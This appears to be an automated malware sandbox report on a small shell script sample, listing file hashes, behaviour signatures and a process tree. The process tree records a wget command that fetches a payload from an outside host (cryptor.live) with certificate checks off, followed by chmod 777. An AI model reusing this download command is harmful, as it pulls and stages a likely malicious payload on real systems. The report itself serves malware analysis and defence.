Analysis
max time kernel: 2s
max time network: 3s
platform: debian-9_mipsel
resource: debian9-mipsel-20240729-en
resource tags: arch:mipsel, image:debian9-mipsel-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 14-11-2024 02:46
Static task
static1
Behavioral task
behavioral1
Sample
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
Resource
debian9-mipsel-20240729-en
General
Target: 890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
Size: 538B
MD5: 8a16d10e22250a89ce00b7e4eaf40ec7
SHA1: ffdf9336427fe2ac3840a79ee5cad114da82b61d
SHA256: 890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa
SHA512: 2e8a99c289f94d7eea75e5c7de551d3b4fe406281efd7dddf530b4492d7e58049f781c5ba781838505357a742a8e6bdc1a4620a08df76aaffe9ac7c611968161
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 1 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid   Process
735   chmod

Writes file to tmp directory (2 IoCs)
Malware often drops required files in the /tmp directory.
Processes:
description                    ioc                    Process
File opened for modification   /tmp/tmp.xx4HfpJ5rf    mktemp
File opened for modification   /tmp/tmp.xx4HfpJ5rf    wget
Processes
/tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
  command: /tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
  PID: 711
  /usr/bin/dirname
    command: dirname -- /tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
    PID: 716
  /bin/mktemp
    command: mktemp
    signatures: Writes file to tmp directory
    PID: 720
  /usr/bin/wget
    command: wget -O /tmp/tmp.xx4HfpJ5rf https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header "Host: cryptor.biz" --no-check-certificate --retry-connrefused "--waitretry=1" "--read-timeout=20" "--timeout=15" -t 0
    signatures: Writes file to tmp directory
    PID: 723
  /bin/chmod
    command: chmod 777 /tmp/2.jpg
    signatures: File and Directory Permissions Modification
    PID: 735